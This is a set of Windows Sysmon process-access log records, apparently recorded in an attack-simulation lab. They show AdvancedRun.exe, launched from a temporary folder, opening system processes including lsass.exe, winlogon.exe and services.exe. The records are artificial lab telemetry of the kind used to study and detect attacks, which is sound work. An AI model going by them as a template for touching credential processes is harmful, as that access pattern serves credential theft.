20:17:12.902{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.901{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078603Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.899{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004078602Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.895{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078601Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.895{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004078600Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.895{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078599Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004078598Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004078597Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004078596Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078595Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078594Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078593Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078592Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078591Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078590Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078589Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078588Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
